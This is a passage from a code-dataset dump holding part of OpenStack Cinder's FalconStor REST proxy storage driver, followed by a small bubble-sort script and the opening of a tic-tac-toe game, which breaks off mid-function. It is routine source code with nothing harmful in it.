initiator):\n params = dict(\n name=cinder_host_name,\n protocoltype=[\"iscsi\"],\n ipaddress=self.fss_host,\n ostype='linux',\n iscsipolicy=dict(\n initiators=[initiator],\n authentication=dict(enabled=False,\n mutualchap=dict(enabled=False))\n )\n )\n return self.FSS.create_client(params)\n\n def create_iscsitarget(self, client_id, initiator, fss_hosts):\n params = dict(\n clientid=client_id,\n name=initiator,\n ipaddress=fss_hosts,\n accessmode='readwritenonexclusive'\n )\n return self.FSS.create_iscsitarget(params)\n\n def _get_iscsi_host(self, connector):\n target_info = self.list_iscsi_target_info()\n if 'data' not in target_info:\n msg = _('No data information in return info.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'iscsitargets' not in target_info['data']:\n msg = _('No iscsitargets in return info.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n if target_info['data']['iscsitargets']:\n iscsitargets = target_info['data']['iscsitargets']\n for iscsitarget in iscsitargets:\n if connector[\"initiator\"] in iscsitarget[\"name\"]:\n target_id = iscsitarget[\"id\"]\n client_id = iscsitarget[\"clientid\"]\n return client_id, target_id\n return None, None\n\n def _create_iscsi_host(self, host_name, initiator, fss_hosts):\n client_id = ''\n target_id = ''\n client_info = self.create_iscsi_client(host_name, initiator)\n if client_info and client_info['rc'] == 0:\n client_id = client_info['id']\n\n target_info = self.create_iscsitarget(client_id, initiator, fss_hosts)\n if target_info['rc'] == 0:\n target_id = target_info['id']\n return client_id, target_id\n\n def _get_fc_client_initiators(self, connector):\n fc_initiators_assigned = []\n fc_available_initiator = []\n fc_initiators_info = self.list_fc_client_initiators()\n if 'data' not in fc_initiators_info:\n raise ValueError(_('No data information in return info.'))\n\n if fc_initiators_info['data']:\n fc_initiators = fc_initiators_info['data']\n for fc_initiator in fc_initiators:\n if fc_initiator['wwpn'] in connector['wwpns']:\n fc_available_initiator.append(str(fc_initiator['wwpn']))\n fc_initiators_assigned.append(dict(\n wwpn=str(fc_initiator['wwpn']),\n assigned=fc_initiator['assigned']))\n return fc_available_initiator, fc_initiators_assigned\n\n def fc_initialize_connection(self, volume, connector, fss_hosts):\n \"\"\"Connect the host and volume; return dict describing connection.\"\"\"\n vid = 0\n fc_target_info = {}\n free_fc_initiator = None\n\n volume_name = self._get_fss_volume_name(volume)\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if not vid:\n msg = (_('Can not find cinder volume - %s.') % volume_name)\n raise exception.VolumeBackendAPIException(msg)\n\n available_initiator, fc_initiators_info = (\n self._get_fc_client_initiators(connector))\n\n if fc_initiators_info is None:\n msg = _('No FC initiator can be added to host.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n for fc_initiator in fc_initiators_info:\n value = fc_initiator['assigned']\n if len(value) == 0:\n free_fc_initiator = fc_initiator['wwpn']\n\n if free_fc_initiator is None:\n msg = _('No free FC initiator can be assigned to host.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n initiator = connector[\"initiator\"]\n host_name = GROUP_PREFIX + '%s-' % connector[\"host\"]\n\n initiator_name = initiator.split(':')\n idx = len(initiator_name) - 1\n client_host_name = host_name + initiator_name[\n idx] + 
'_FC-wwpn-' + free_fc_initiator\n\n client_id = self.create_fc_client(client_host_name, free_fc_initiator)\n\n try:\n self.assign_fc_vdev(client_id, vid)\n time.sleep(3)\n except FSSHTTPError as err:\n with excutils.save_and_reraise_exception() as ctxt:\n if (err.code == 2415984845 and \"XML_ERROR_CLIENT_EXIST\"\n in err.text):\n ctxt.reraise = False\n LOG.warning(_LW('Assign volume failed with message: %(msg)s.'),\n {\"msg\": err.reason})\n finally:\n lun = self.FSS._get_fc_client_info(client_id, vid)\n\n fc_target_info['lun'] = lun\n fc_target_info['available_initiator'] = available_initiator\n\n if not fc_target_info:\n msg = _('Failed to get iSCSI target info for the LUN: %s.')\n raise exception.VolumeBackendAPIException(data=msg % volume_name)\n return fc_target_info\n\n def fc_terminate_connection(self, volume, connector):\n client_id = 0\n volume_name = self._get_fss_volume_name(volume)\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n output = self.list_volume_info(vid)\n if 'data' not in output:\n msg = _('No vdev information in given data')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'clients' not in output['data']:\n msg = _('No clients in vdev information.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n client_info = output['data']['clients']\n for fcclients in client_info:\n client_id = int(fcclients['id'])\n\n if client_id == 0:\n msg = _(\n 'Can not find client id. The connection target name is %s.')\n raise exception.VolumeBackendAPIException(\n data=msg % connector[\"initiator\"])\n try:\n self.unassign_vdev(client_id, vid)\n except FSSHTTPError as err:\n with excutils.save_and_reraise_exception() as ctxt:\n if (err.code == 2415984988 and\n \"XML_ERROR_VIRTUAL_DEV_NOT_ASSIGNED_TO_iSCSI_TARGET\"\n in err.text):\n ctxt.reraise = False\n LOG.warning(_LW('Disconnection failed with message: '\n \"%(msg)s.\"), {\"msg\": err.reason})\n return client_id\n\n def initialize_connection_iscsi(self, volume, connector, fss_hosts):\n \"\"\"Connect the host and volume; return dict describing connection.\"\"\"\n vid = 0\n iscsi_target_info = {}\n self._check_iscsi_option()\n client_id, target_id = self._get_iscsi_host(connector)\n\n if target_id is None:\n initiator = connector[\"initiator\"]\n host_name = GROUP_PREFIX + '%s-' % connector[\"host\"]\n\n initiator_info = initiator.split(':')\n idx = len(initiator_info) - 1\n client_host_name = host_name + initiator_info[idx]\n\n client_id, target_id = self._create_iscsi_host(client_host_name,\n initiator,\n fss_hosts)\n volume_name = self._get_fss_volume_name(volume)\n try:\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if not vid:\n msg = (_('Can not find cinder volume - %(volumeName)s.') %\n {\"volumeName\": volume_name})\n raise exception.VolumeBackendAPIException(msg)\n\n self.assign_iscsi_vdev(client_id, target_id, vid)\n time.sleep(3)\n except FSSHTTPError as err:\n with excutils.save_and_reraise_exception() as ctxt:\n if (err.code == 2415984989 and\n \"XML_ERROR_VIRTUAL_DEV_ASSIGNED_TO_iSCSI_TARGET\" in\n err.text):\n ctxt.reraise = False\n LOG.warning(_LW(\"Assign volume failed with message: %(msg)s.\"),\n {\"msg\": err.reason})\n finally:\n (lun, target_name) = self.FSS._get_iscsi_target_info(client_id,\n vid)\n iscsi_target_info['lun'] = lun\n iscsi_target_info['iqn'] = target_name\n\n if not iscsi_target_info:\n msg = _('Failed to get iSCSI target info for the LUN: %s')\n raise exception.VolumeBackendAPIException(data=msg % 
volume_name)\n return iscsi_target_info\n\n def terminate_connection_iscsi(self, volume, connector):\n volume_name = self._get_fss_volume_name(volume)\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n client_id, target_id = self._get_iscsi_host(connector)\n if not client_id:\n msg = _('Can not find client id. The connection target name '\n 'is %s.')\n raise exception.VolumeBackendAPIException(\n data=msg % connector[\"initiator\"])\n try:\n self.unassign_vdev(client_id, vid)\n except FSSHTTPError as err:\n with excutils.save_and_reraise_exception() as ctxt:\n if (err.code == 2415984988 and\n \"XML_ERROR_VIRTUAL_DEV_NOT_ASSIGNED_TO_iSCSI_TARGET\"\n in err.text):\n ctxt.reraise = False\n LOG.warning(_LW(\"Disconnection failed with message: \"\n \"%(msg)s.\"), {\"msg\": err.reason})\n finally:\n is_empty = self.FSS._check_host_mapping_status(client_id,\n target_id)\n\n if is_empty:\n self.FSS.delete_iscsi_target(target_id)\n self.FSS.delete_client(client_id)\n\n def _get_existing_volume_ref_vid(self, existing_ref):\n if 'source-id' in existing_ref:\n vid = existing_ref['source-id']\n else:\n reason = _(\"FSSISCSIDriver manage_existing requires vid to \"\n \"identify an existing volume.\")\n raise exception.ManageExistingInvalidReference(\n existing_ref=existing_ref, reason=reason)\n vdev_info = self.list_volume_info(vid)\n if not vdev_info:\n raise exception.ManageExistingInvalidReference(\n existing_ref=existing_ref,\n reason=_(\"Unable to find volume with FSS vid =%s.\") % vid)\n\n if 'data' not in vdev_info:\n msg = _('No vdev information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'sizemb' not in vdev_info['data']:\n msg = _('No vdev sizemb in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n return vdev_info['data']['sizemb']\n\n def _manage_existing_volume(self, vid, volume):\n new_vol_name = self._get_fss_volume_name(volume)\n try:\n self.rename_vdev(vid, new_vol_name)\n except FSSHTTPError as err:\n with excutils.save_and_reraise_exception() as ctxt:\n ctxt.reraise = False\n LOG.warning(_LW(\"Volume manage_existing_volume was unable \"\n \"to rename the volume, error message: %s.\"),\n err.reason)\n\n def unmanage(self, volume):\n volume_name = self._get_fss_volume_name(volume)\n unmanaged_vol_name = volume_name + \"-unmanaged\"\n try:\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n self.rename_vdev(vid, unmanaged_vol_name)\n except FSSHTTPError as err:\n LOG.warning(_LW(\"Volume unmanage was unable to rename the volume,\"\n \" error message: %(msg)s.\"), {\"msg\": err.reason})\n\n\nclass FSSRestCommon(object):\n def __init__(self, host, username, password, fss_debug):\n self.hostip = host\n self.username = username\n self.password = password\n self.session_id = None\n self.fss_debug = fss_debug\n\n def _fss_request(self, method, path, data=None):\n json_data = None\n url = \"http://%(ip)s/%(product)s/%(path)s\" % {\n \"ip\": self.hostip, \"product\": PRODUCT_NAME, \"path\": path}\n headers = {\"Content-Type\": \"application/json\"}\n if self.session_id is not None:\n cookie = dict(\n Cookie=SESSION_COOKIE_NAME + '=' + self.session_id\n )\n headers.update(cookie)\n\n if data is not None:\n request_body = json.dumps(data).encode(\"utf-8\")\n else:\n request_body = None\n\n connection = http_client.HTTPConnection(self.hostip, 80, timeout=60)\n\n if self.fss_debug:\n LOG.info(_LI(\"[FSS_RESTAPI]====%(method)s@url=%(url)s ====\"\n \"@request_body=%(body)s===\") % 
{\n \"method\": method,\n \"url\": url,\n \"body\": request_body})\n\n attempt = 1\n while True:\n connection.request(method, url, request_body, headers)\n response = connection.getresponse()\n response_body = response.read()\n if response_body:\n try:\n data = json.loads(response_body)\n json_data = json.dumps(data)\n json_data = json.loads(json_data.decode('utf8'))\n except ValueError:\n pass\n\n if self.fss_debug:\n LOG.info(_LI(\"[FSS_RESTAPI]==@json_data: %s ==\"), json_data)\n\n if response.status == 200:\n return json_data\n elif response.status == 404:\n msg = (_('FSS rest api return failed, method=%(method)s, '\n 'uri=%(url)s, response=%(response)s') % {\n \"method\": method,\n \"url\": url,\n \"response\": response_body})\n raise exception.VolumeBackendAPIException(msg)\n else:\n err_code = json_data['rc']\n if (attempt > RETRY_CNT) or (str(err_code) not in RETRY_LIST):\n err_target = (\"method=%(method)s, url=%(url)s, \"\n \"response=%(response)s\" %\n {\"method\": method, \"url\": url,\n \"response\": response_body})\n err_response = self.get_fss_error_code(err_code)\n err = dict(\n code=err_code,\n text=err_response['key'],\n reason=err_response['message']\n )\n raise FSSHTTPError(err_target, err)\n attempt += 1\n LOG.warning(_LW(\"Retry with rc: %s.\"), err_code)\n self._random_sleep(RETRY_INTERVAL)\n if err_code == 107:\n self.fss_login()\n\n def _random_sleep(self, interval=60):\n nsleep = random.randint(10, interval * 10)\n value = round(float(nsleep) / 10, 2)\n time.sleep(value)\n\n #\n # REST API session management methods\n #\n def fss_login(self):\n url = '%s/%s' % (FSS_AUTH, FSS_LOGIN)\n params = dict(\n username=self.username,\n password=self.password,\n server=self.hostip\n )\n data = self._fss_request(POST, url, params)\n if 'id' in data:\n self.session_id = data['id']\n return self.session_id\n\n #\n # Physical Adapters management methods\n #\n\n def list_physicaladapter_info(self, adapter_id=None):\n url = '%s/%s' % (FSS_PHYSICALRESOURCE, FSS_PHYSICALADAPTER)\n if adapter_id is not None:\n url = '%s/%s/%s' % (FSS_PHYSICALRESOURCE,\n FSS_PHYSICALADAPTER, adapter_id)\n return self._fss_request(GET, url)\n\n def list_fc_target_wwpn(self):\n url = '%s/%s/%s' % (FSS_PHYSICALRESOURCE, FSS_PHYSICALADAPTER,\n FSS_FC_TGT_WWPN)\n tgt_wwpn = []\n output = self._fss_request(GET, url)\n if output['data']:\n tgt_wwpns = output['data']\n for tgt_alias_wwpn in tgt_wwpns:\n tgt_wwpn.append(\n str(tgt_alias_wwpn['aliaswwpn'].replace('-', '')))\n return tgt_wwpn\n\n def list_fc_client_initiators(self):\n url = '%s/%s/%s' % (FSS_PHYSICALRESOURCE, FSS_PHYSICALADAPTER,\n FSS_FCCLIENTINITIATORS)\n return self._fss_request(GET, url)\n\n #\n # storage pool management methods\n #\n\n def list_pool_info(self, pool_id=None):\n url = '%s/%s' % (FSS_PHYSICALRESOURCE, FSS_STORAGE_POOL)\n if pool_id is not None:\n url = '%s/%s/%s' % (FSS_PHYSICALRESOURCE,\n FSS_STORAGE_POOL, pool_id)\n return self._fss_request(GET, url)\n\n #\n # Volume and snapshot management methods\n #\n\n def create_vdev(self, params):\n metadata = {}\n url = '%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN)\n output = self._fss_request(POST, url, params)\n if output:\n if output['rc'] == 0:\n metadata['FSS-vid'] = output['id']\n return metadata\n\n def _check_mirror_sync_finished(self, vid, timeout):\n starttime = time.time()\n while True:\n self._random_sleep()\n if time.time() > starttime + timeout:\n msg = (_('FSS get mirror sync timeout on vid: %s ') % vid)\n raise exception.VolumeBackendAPIException(data=msg)\n elif 
self._check_mirror_sync_status(vid):\n break\n\n def delete_vdev(self, vid):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN, vid)\n return self._fss_request(DELETE, url, dict(force=True))\n\n def extend_vdev(self, vid, params):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN, vid)\n return self._fss_request(PUT, url, params)\n\n def rename_vdev(self, vid, params):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN, vid)\n return vid, self._fss_request(PUT, url, params)\n\n def list_fss_volume_info(self, vid=None):\n url = '%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN)\n if vid is not None:\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SAN, vid)\n return self._fss_request(GET, url)\n\n def _get_fss_vid_from_name(self, volume_name, fss_type=None):\n vid = []\n output = self.list_fss_volume_info()\n try:\n if \"virtualdevices\" in output['data']:\n for item in output['data']['virtualdevices']:\n if item['name'] in volume_name:\n vid.append(item['id'])\n except Exception:\n msg = (_('Can not find cinder volume - %s') % volume_name)\n raise exception.VolumeBackendAPIException(msg)\n\n if fss_type is not None and fss_type == FSS_SINGLE_TYPE:\n vid = ''.join(str(x) for x in vid)\n return vid\n\n def _check_if_snapshot_tm_exist(self, vid):\n snapshotenabled = False\n timemarkenabled = False\n sizemb = 0\n output = self.list_fss_volume_info(vid)\n if \"snapshotenabled\" in output['data']:\n snapshotenabled = output['data']['snapshotenabled']\n if \"timemarkenabled\" in output['data']:\n timemarkenabled = output['data']['timemarkenabled']\n if \"sizemb\" in output['data']:\n sizemb = output['data']['sizemb']\n return (snapshotenabled, timemarkenabled, sizemb)\n\n def create_vdev_snapshot(self, params):\n url = '%s/%s/%s' % (FSS_BATCH, FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_RESOURCE)\n return self._fss_request(POST, url, params)\n\n def create_timemark_policy(self, vid, **kwargs):\n url = '%s/%s/%s' % (FSS_BATCH, FSS_LOGICALRESOURCE, FSS_TIMEMARKPOLICY)\n params = dict(\n idlist=[vid],\n automatic=dict(enabled=False),\n maxtimemarkcount=MAXSNAPSHOTS\n )\n if kwargs.get('storagepoolid'):\n params.update(kwargs)\n return self._fss_request(POST, url, params)\n\n def create_timemark(self, vid, snap_name):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_TIMEMARK, vid)\n params = dict(\n comment=snap_name,\n priority='medium',\n snapshotnotification=False\n )\n return self._fss_request(POST, url, params)\n\n def get_timemark(self, vid):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_TIMEMARK, vid)\n return self._fss_request(GET, url)\n\n def delete_timemark(self, timestamp):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_TIMEMARK, timestamp)\n params = dict(\n deleteallbefore=False\n )\n return self._fss_request(DELETE, url, params)\n\n def delete_timemark_policy(self, vid):\n url = '%s/%s/%s' % (FSS_BATCH, FSS_LOGICALRESOURCE, FSS_TIMEMARKPOLICY)\n params = dict(\n idlist=[vid]\n )\n return self._fss_request(DELETE, url, params)\n\n def delete_vdev_snapshot(self, vid):\n url = '%s/%s/%s' % (FSS_BATCH, FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_RESOURCE)\n params = dict(\n idlist=[vid]\n )\n return self._fss_request(DELETE, url, params)\n\n def copy_timemark(self, timestamp, **kwargs):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_TIMEMARK, timestamp)\n params = dict(\n action='copy',\n includetimeviewdata=False\n )\n params.update(kwargs)\n return self._fss_request(PUT, url, params)\n\n def get_timemark_copy_status(self, vid):\n url = '%s/%s/%s?type=operationstatus' % (\n FSS_LOGICALRESOURCE, FSS_TIMEMARK, vid)\n 
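# query the operation-status endpoint for this virtual device's TimeMark copy\n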
return self._fss_request(GET, url)\n\n def _check_tm_copy_status(self, vid):\n finished = False\n output = self.get_timemark_copy_status(vid)\n if output['timemarkoperationstatus']:\n timemark_status = output['timemarkoperationstatus']\n if timemark_status['operation'] == \"copy\":\n if timemark_status['status'] == 'completed':\n finished = True\n return finished\n\n def _check_tm_copy_finished(self, vid, timeout):\n finished = False\n starttime = time.time()\n while True:\n self._random_sleep()\n if time.time() > starttime + timeout:\n msg = (_('FSS get timemark copy timeout on vid: %s') % vid)\n raise exception.VolumeBackendAPIException(data=msg)\n elif self._check_tm_copy_status(vid):\n finished = True\n return finished\n\n #\n # TimeView methods\n #\n\n def create_timeview(self, tv_vid, params):\n vid = ''\n volume_metadata = {}\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_TIMEVIEW, tv_vid)\n output = self._fss_request(POST, url, params)\n if output and output['rc'] == 0:\n if output['copyid'] == -1:\n vid = output['id']\n else:\n vid = output['copyid']\n volume_metadata['FSS-vid'] = vid\n return volume_metadata\n\n #\n # Mirror methods\n #\n\n def create_mirror(self, vid, pool_id):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_MIRROR, vid)\n params = dict(\n category='virtual',\n selectioncriteria='anydrive',\n mirrortarget=\"virtual\"\n )\n params.update(pool_id)\n return self._fss_request(POST, url, params)\n\n def get_mirror_sync_status(self, vid):\n url = '%s/%s/%s?type=syncstatus' % (\n FSS_LOGICALRESOURCE, FSS_MIRROR, vid)\n return self._fss_request(GET, url)\n\n def _check_mirror_sync_status(self, vid):\n finished = False\n output = self.get_mirror_sync_status(vid)\n if output['mirrorsyncstatus']:\n mirrorsyncstatus = output['mirrorsyncstatus']\n if mirrorsyncstatus['status'] == \"insync\":\n if mirrorsyncstatus['percentage'] == 0:\n finished = True\n return finished\n\n def _set_mirror(self, vid, **kwargs):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_MIRROR, vid)\n return self._fss_request(PUT, url, kwargs)\n\n def sync_mirror(self, vid):\n return self._set_mirror(vid, action='sync')\n\n def promote_mirror(self, vid, new_volume_name):\n return self._set_mirror(vid, action='promote', name=new_volume_name)\n\n #\n # Host management methods\n #\n\n def get_server_options(self):\n url = '%s/%s' % (FSS_SERVER, FSS_OPTIONS)\n return self._fss_request(GET, url)\n\n def set_server_options(self, action):\n url = '%s/%s' % (FSS_SERVER, FSS_OPTIONS)\n params = dict(\n action=action,\n enabled=True\n )\n return self._fss_request(PUT, url, params)\n\n def get_server_name(self):\n url = '%s/%s' % (FSS_SERVER, FSS_OPTIONS)\n return self._fss_request(GET, url)\n\n #\n # SAN Client management methods\n #\n\n def list_client_initiators(self):\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_SANCLIENT,\n FSS_ISCSI_CLIENT_INITIATORS)\n return self._fss_request(GET, url)\n\n def get_default_portal(self):\n url = '%s/%s/%s' % (FSS_SERVER, FSS_OPTIONS, FSS_PORTAL)\n return self._fss_request(GET, url)\n\n def create_client(self, params):\n url = '%s/%s' % (FSS_CLIENT, FSS_SANCLIENT)\n return self._fss_request(POST, url, params)\n\n def list_sanclient_info(self, client_id=None):\n url = '%s/%s' % (FSS_CLIENT, FSS_SANCLIENT)\n if client_id is not None:\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_SANCLIENT,\n client_id)\n return self._fss_request(GET, url)\n\n def assign_vdev(self, client_id, params):\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_SANCLIENT, client_id)\n return self._fss_request(PUT, url, params)\n\n def 
unassign_vdev(self, client_id, params):\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_SANCLIENT, client_id)\n return self._fss_request(PUT, url, params)\n\n def _get_iscsi_target_info(self, client_id, vid):\n lun = 0\n target_name = None\n output = self.list_sanclient_info(client_id)\n\n if 'data' not in output:\n msg = _('No target information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'iscsidevices' not in output['data']:\n msg = _('No iscsidevices information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n for iscsidevices in output['data']['iscsidevices']:\n if int(vid) == int(iscsidevices['id']):\n lun = iscsidevices['lun']\n iscsitarget_info = iscsidevices['iscsitarget']\n for key, value in iscsitarget_info.items():\n if key == 'name':\n target_name = value\n\n return lun, target_name\n\n def _check_host_mapping_status(self, client_id, target_id):\n is_empty = False\n hosting_cnt = 0\n output = self.list_sanclient_info(client_id)\n if 'data' not in output:\n msg = _('No target in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'iscsidevices' not in output['data']:\n msg = _('No iscsidevices information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n if len(output['data']['iscsidevices']) == 0:\n is_empty = True\n else:\n for iscsidevices in output['data']['iscsidevices']:\n iscsitarget_info = iscsidevices['iscsitarget']\n for key, value in iscsitarget_info.items():\n if key == 'id' and target_id == value:\n hosting_cnt += 1\n\n if hosting_cnt == 0:\n is_empty = True\n return is_empty\n\n def list_iscsi_target_info(self, target_id=None):\n url = '%s/%s' % (FSS_CLIENT, FSS_ISCSI_TARGET)\n if target_id is not None:\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_ISCSI_TARGET,\n target_id)\n return self._fss_request(GET, url)\n\n def _get_iscsi_target_id(self, initiator_iqn):\n target_id = ''\n client_id = ''\n output = self.list_iscsi_target_info()\n\n if 'data' not in output:\n msg = _('No target in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'iscsitargets' not in output['data']:\n msg = _('No iscsitargets for target.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n for targets in output['data']['iscsitargets']:\n if 'name' in targets:\n if initiator_iqn in targets['name']:\n target_id = str(targets['id'])\n client_id = str(targets['clientid'])\n break\n return target_id, client_id\n\n def create_iscsitarget(self, params):\n url = '%s/%s' % (FSS_CLIENT, FSS_ISCSI_TARGET)\n return self._fss_request(POST, url, params)\n\n def delete_iscsi_target(self, target_id):\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_ISCSI_TARGET, target_id)\n params = dict(\n force=True\n )\n return self._fss_request(DELETE, url, params)\n\n def delete_client(self, client_id):\n url = '%s/%s/%s' % (FSS_CLIENT, FSS_SANCLIENT, client_id)\n return self._fss_request(DELETE, url)\n\n def _get_fc_client_info(self, client_id, vid):\n lun = 0\n output = self.list_sanclient_info(client_id)\n if 'data' not in output:\n msg = _('No target information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n if 'fcdevices' not in output['data']:\n msg = _('No fcdevices information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n for fcdevices in output['data']['fcdevices']:\n if int(vid) == int(fcdevices['id']):\n lun = 
fcdevices['lun']\n\n return lun\n\n #\n # Group related methods\n #\n\n def create_group(self, params):\n url = '%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP)\n return self._fss_request(POST, url, params)\n\n def list_group_info(self, gid=None):\n if gid is not None:\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP, gid)\n else:\n url = '%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP)\n return self._fss_request(GET, url)\n\n def set_group(self, gid, join_params=None, leave_params=None):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP, gid)\n if join_params:\n self._fss_request(PUT, url, join_params)\n if leave_params:\n self._fss_request(PUT, url, leave_params)\n\n def create_group_timemark_policy(self, gid, params):\n url = '%s/%s/%s/%s' % (FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_GROUP, FSS_TIMEMARKPOLICY, gid)\n return self._fss_request(POST, url, params)\n\n def _check_if_group_tm_enabled(self, gid):\n timemarkenabled = False\n output = self.list_group_info(gid)\n if \"timemarkenabled\" in output['data']:\n timemarkenabled = output['data']['timemarkenabled']\n return timemarkenabled\n\n def create_group_timemark(self, gid, params):\n url = '%s/%s/%s/%s' % (FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_GROUP, FSS_TIMEMARK, gid)\n return self._fss_request(POST, url, params)\n\n def get_group_timemark(self, gid):\n url = '%s/%s/%s/%s' % (FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_GROUP, FSS_TIMEMARK, gid)\n return self._fss_request(GET, url)\n\n def delete_group_timemark(self, timestamp, params):\n url = '%s/%s/%s/%s' % (FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_GROUP, FSS_TIMEMARK, timestamp)\n return self._fss_request(DELETE, url, params)\n\n def delete_group_timemark_policy(self, gid):\n url = '%s/%s/%s/%s' % (FSS_LOGICALRESOURCE,\n FSS_SNAPSHOT_GROUP, FSS_TIMEMARKPOLICY, gid)\n return self._fss_request(DELETE, url)\n\n def delete_snapshot_group(self, gid):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP, gid)\n return self._fss_request(DELETE, url)\n\n def destroy_group(self, gid):\n url = '%s/%s/%s' % (FSS_LOGICALRESOURCE, FSS_SNAPSHOT_GROUP, gid)\n return self._fss_request(DELETE, url)\n\n def get_fss_error_code(self, err_id):\n try:\n url = '%s/%s/%s' % (FSS_SERVER, FSS_RETURN_CODE, err_id)\n output = self._fss_request(GET, url)\n if output['rc'] == 0:\n return output\n except Exception:\n msg = (_('Can not find this error code:%s.') % err_id)\n raise exception.APIException(reason=msg)\n\n\nclass FSSHTTPError(Exception):\n\n def __init__(self, target, response):\n super(FSSHTTPError, self).__init__()\n self.target = target\n self.code = response['code']\n self.text = response['text']\n self.reason = response['reason']\n\n def __str__(self):\n msg = (\"FSSHTTPError code {0} returned by REST at {1}: {2}\\n{3}\")\n return msg.format(self.code, self.target,\n self.reason, self.text)\n","sub_path":"cinder/volume/drivers/falconstor/rest_proxy.py","file_name":"rest_proxy.py","file_ext":"py","file_size_in_byte":58141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"418154304","text":"\"\"\"\n******************************************************************************\n* Purpose: Take int input from user and sort using Bubble sort.\n*\n* @author: Pushkar Ishware\n* @version: 3.7\n* @since: 26-12-2018\n*\n******************************************************************************\n\"\"\"\nfrom Utilities import utilities\nfrom Utilities.utilities import util # new\n\nu = util()\n\n\ndef BubbleSort():\n try:\n 
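# read one line of space-separated tokens and convert each to int; a non-integer token raises ValueError\n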
data = list(input(\"Enter (INT)elements separated by spaces\").split(\" \"))\n data = [int(x) for x in data]\n u.BubbleSort_User(data)\n\n\n except ValueError:\n print(\"String value given in int list\")\n\n\nif __name__ == \"__main__\":\n BubbleSort()\n","sub_path":"BridgeLabz_Python/Functional/A8_BubbleSort.py","file_name":"A8_BubbleSort.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"411722283","text":"#tictactoe by David Al-Yakobi\n#07/28/2019\n\nimport random\nfrom os import system, name\n\n#function to clear() screen easily later on \ndef clear():\n\tif name == 'nt': #if windows, clear cmd prompt\n\t\t_= system('cls')\n\telse: #if linux or mac, clear terminal\n\t\t_= system('clear')\n\n#function to display board with string concatination\ndef display_board(board):\n print(' ' + board[0] + ' '*3 + '|' + ' '*3 +board[1] +' '*3 + '|' +' '*3 +board[2])\n print('-'*20)\n print(' ' + board[3] + ' '*3 + '|' + ' '*3 +board[4] +' '*3 + '|' +' '*3 +board[5])\n print('-'*20)\n print(' ' + board[6] + ' '*3 + '|' + ' '*3 +board[7] +' '*3 + '|' +' '*3 +board[8])\n \n'''testing display_board() ''' \n#test_board = ['X','X','O','X','O','X','O','X','O','X']\n#display_board(test_board)\n\n#get player input function\ndef player_input():\n while True:\n user_input = input('Would you like to be X or O: ').upper()\n if user_input == 'X':\n return ('X','O')\n elif user_input == 'O':\n return ('O','X')\n else:\n print('\\nPlease Enter: X or O\\n')\n\n'''testing player_input()'''\n#player_input()\n\n#function to place marker on board\ndef place_marker(board, marker, position):\n board[position] = marker\n\n'''testing marker placement'''\n#place_marker(testBoard,'X',2)\n#display_board(testBoard)\n\n#function to check all possible winning senarios\ndef win_check(board, mark):\n return (board[0] == board[1] == board[2] == mark or \n \tboard[3] == board[4] == board[5] == mark or \n 